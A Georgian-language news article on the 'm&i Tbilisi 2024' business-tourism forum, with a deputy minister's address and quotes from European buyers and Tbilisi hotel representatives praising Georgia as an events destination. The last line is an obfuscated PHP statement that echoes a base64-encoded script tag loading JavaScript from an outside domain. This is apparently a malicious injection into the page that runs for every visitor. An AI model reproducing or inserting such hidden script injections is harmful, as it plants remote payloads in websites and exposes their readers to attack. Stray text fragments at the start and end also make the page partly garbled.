celsiusi
ავერსი შნაიდერი

 საქართველოს ტურიზმის ეროვნული ადმინისტრაციის ორგანიზებით, თბილისში საქმიანი ტურიზმის საერთაშორისო ფორუმი „m&i Tbilisi 2024“ ტარდება. ამის შესახებ ინფორმაციას საქართველოს ტურიზმის ეროვნული ადმინისტრაცია ავრცელებს.

მათი ცნობით, სასტუმრო პარაგრაფ თბილისში, ფორუმის მონაწილეებს სიტყვით ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილემ მარიამ ქვრივიშვილმა მიმართა. ფორუმს ტურიზმის ეროვნული ადმინისტრაციის ხელმძღვანელი მაია ომიაძე დაესწრო.

საერთაშორისო ფორუმი 1- 4 ივლისის ჩათვლით ტარდება, ღონისძიების ფარგლებში საქართველოს პოტენციური დამკვეთები ეწვევიან - დიდი ბრიტანეთიდან და ევროპის შემდეგი ქვეყნებიდან: ბელგია, ჩეხეთი, დანია, ფინეთი, საფრანგეთი, გერმანია, უნგრეთი, ირლანდია, იტალია, ლიეტუვა, ნიდერლანდები, პოლონეთი, სერბეთი, სლოვაკეთი, ესპანეთი, შვედეთი და შვეიცარია.

„ძალიან ვამაყობ, რომ საქართველოში „m&I”-ის ფორუმს ვატარებთ. თქვენს ქვეყანაში პირველად არ ვარ. ჩვენ გავითვალისწინეთ ბევრი ევროპელის რჩევა საქართველოში ფორუმის ჩასატარებლად. შარშან „m&I”-ის ღონისძიება საქართველოში ძალიან კარგად ჩატარდა და წელსაც ძალიან წარმატებული იქნება. ჩვენ მთელი ევროპიდან საქართველოში, ძალიან ბევრი კომპანია ჩამოვიყვანეთ.

ფორუმის მონაწილეებმა საქართველოს ტურისტული მიმართულება გაიცნეს, რომელსაც აქვს საჭირო ინფრასტრუქტურა ღონისძიებების გასამართად, ასევე გაეცნენ ქართულ კულტურას. იმედი მაქვს, ძალიან ბევრი ღონისძიების ორგანიზატორი საქართველოს აირჩევს, სასურველ მიმართულებად“,- განაცხადა „m&I”-ის კომერციულმა დირექტორმა ჰერი კაშემმა.

ფორუმის მონაწილე მარკ გრინის განცხადებით, ორგანიზატორებმა საქართველო აირჩიეს, როგორც ერთ-ერთი საუკეთესო მიმართულება. მისივე შეფასებით, პირველი დღის შეხვედრები უმაღლეს დონეზე ჩატარდა.

„მე დედოფალ ელისაბედ მეორის ცენტრს წარმოვადგენ, რომელიც ლონდონის უდიდესი ღონისძიებების ადგილია ვესტმისტერში. „m&I“ ფორუმი საუკეთესო შესაძლებლობაა, რომელიც მყიდველებს და მომწოდებლებს ერთმანეთს აკავშირებს. ორგანიზატორებმა აირჩიეს საქართველო, როგორც ერთ-ერთი საუკეთესო მიმართულება, ძალიან მომეწონა რაც ვნახე, ეს არის მშვენიერი ტურისტული მიმართულება, საოცარი სასტუმროები, პირველი დღის შეხვედრა უმაღლეს დონეზე ჩატარდა, იყვნენ ძალიან კარგი მყიდველები, ეს არის სწორედ რასაც ჩვენ ველოდებით“,- განაცხადა ფორუმის მონაწილემ დიდი ბრიტანეთიდან, მარკ გრინიმ.

ფორუმის მონაწილე ზუზანა ბარტა ნაგიმის თქმით, საქართველოს როგორც პატარა, ისე დიდი ჯგუფებისთვის ბევრი რამის შეთავაზება შეუძლია, რომლებსაც ლამაზი ქვეყნის აღმოჩენა სურთ.

“ძალიან მოხარული ვარ, რომ „m&I”-ის ფორუმი საქართველოში ტარდება. გასულ წელს მქონდა პატივი შევხვედროდი ორგანიზატორებს, ჩვენ განვიხილავდით ფორუმის საქართველოში ჩატარების შესაძლებლობას და ძალიან სასიხარულოა, რომ დღეს ფორუმი აქ იმართება. მოხარული ვარ, რომ საშუალება მოგვეცა დაგვეთვალიერებინა დედაქალაქი, ფორუმის ფარგლებში ჩვენ ვხვდებით პარტნიორებს, განვიხილავთ გეგმებს. საქართველოს როგორც პატარა, ისე დიდი ჯგუფებისთვის ბევრი რამის შეთავაზება შეუძლია, რომლებსაც ლამაზი ქვეყნის აღმოჩენა სურთ. ძალიან სასიამოვნოა, რომ ბუდაპეშტსა და ქუთაისს შორის პირდაპირი ფრენებია“,- განაცხადა ფორუმის მონაწილემ უნგრეთიდან, ზუზანა ბარტა ნაგიმ.

მათივე ცნობით, ფორუმის მონაწილეებს საშუალება აქვთ გაეცნონ ინფრასტრუქტურას, დაათვალიერონ ტურისტული ადგილები, შეხვდნენ ადგილობრივი ტურისტული სექტორის, წამყვანი კომპანიების წარმომადგენლებს და მათთან საქმიანი ურთიერთობები დაამყარონ შემდგომში საქართველოში ღონისძიებების დაკვეთისა და გამართვის პერსპექტივით.

ფორუმში მონაწილე დამკვეთები სამიზნე ბაზრებზე მოქმედ მსხვილ კომპანიებს წარმოადგენენ, რომლებიც აქტიურად მუშაობენ ღონისძიებების დამკვეთ კლიენტებთან, შემდგომში ღონისძიებების ორგანიზებისთვის სხვადასხვა ქვეყნისა თუ დანიშნულების ადგილის შეთავაზების მიზნით.

მათვე ინფორმაციით, „m&i Forum“-ის ერთ-ერთი ღონისძიების, „m&i Tbilisi“-ის ფარგლებში საქართველოს ევროპიდან 65 პოტენციური დამკვეთი ეწვია. ასევე, მსოფლიოს სხვადასხვა ქვეყნიდან, ტურიზმის სფეროში მოღვაწე, კერძო სექტორის სერვისის მიმწოდებელი, 60 საერთაშორისო კომპანიის წარმომადგენელი.

„m&i Tbilisi“-ის ფორუმის ფარგლებში 150-მდე პოტენციურ დამკვეთს და სერვისის მიმწოდებელ კომპანიებს შესაძლებლობა აქვთ დედაქალაქის ტურისტულ ინფრასტრუქტურას და საქმიანი ტურიზმის პოტენციალს გაეცნონ.

„m&i“ ფარგლებში 83 სერვისის მიმწოდებელი ადგილობრივი და საერთაშორისო კომპანია, B2B ფორმატში, 3 დღის განმავლობაში პოტენციურ დამკვეთებთან, 40-მდე შეხვედრას მართავს.

„m&i“-ის ფორუმი ერთ-ერთი ყველაზე მნიშვნელოვანია საქმიანი ტურიზმის სფეროში. პირველად, რამდენიმე წლის წინ, როდესაც ამ ფორუმს ვესწრებოდით არ გვჯეროდა, რომ მალე საქართველო ამ ფორუმის მასპინძელი იქნებოდა. ჩვენი ქვეყნისთვის ფორუმის ჩატარება ძალიან მნიშვნელოვანია, როგორც ქვეყნის პოპულარიზაციისთვის, ისე ევროპელი სტუმრების მიღების კუთხითაც. დიდი იმედი მაქვს, საქართველო ევროპიდან ძალიან ბევრ სტუმარს უმასპინძლებს“ - განაცხადა სასტუმრო ბილტმორი თბილისის წარმომადგენელმა მარიამ ქუთათელაძემ.

„მოხარულები ვართ ვუმასპინძლოთ „m&i“-ის მასშტაბურ ფორუმს, საქართველო პირველად მასპინძლობს ამ ფორუმს, რაც ჩვენი ქვეყნისთვის, ტურიზმისთვის ძალიან მნიშვნელოვანი ნაბიჯია, ეს ხელს უწყობს საქართველოს პოზიციონირებას მსოფლიო რუკაზე, როგორც ერთ-ერთი ახალი ადგილი ღონისძიებებისა და დიდი ჯგუფების მისაღებად“, აცხადებს სასტუმრო პარაგრაფის წარმომადგენელი თამუნა ჩხეიძე.

მათივე ცნობით, საქართველოს ტურიზმის ეროვნული ადმინისტრაციის საკონვენციო და საგამოფენო ბიურო ყოველწლიურად მონაწილეობს „m&i Forum“-ის მიერ, ევროპის სხვადასხვა ქვეყანაში დაგეგმილ რიგ ღონისძიებებში. ფორუმები, საქმიანი ტურიზმის მიმართულებით, გამორჩეულად მნიშვნელოვანი ღონისძიებებია, რომლებსაც მსოფლიოს წამყვანი საკონვენციო ბიუროების წარმომადგენლები, სფეროს ექსპერტები, ტურისტული კომპანიები, ბიზნეს ტურიზმის სფეროში მოღვაწე ორგანიზაციების წარმომადგენლები და ღონისძიებების დამკვეთები ესწრებიან.

ფორუმის მონაწილე დამკვეთები სამიზნე ბაზრებზე არსებულ მსხვილ კომპანიებს წარმოადგენენ, რომლებიც აქტიურად მუშაობენ ღონისძიებების დამკვეთ კლიენტებთან, შემდგომში მასშტაბური ღონისძიებების ორგანიზებისთვის, სხვადასხვა ქვეყნისა თუ დანიშნულების ადგილის შეთავაზების მიზნით.

727
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");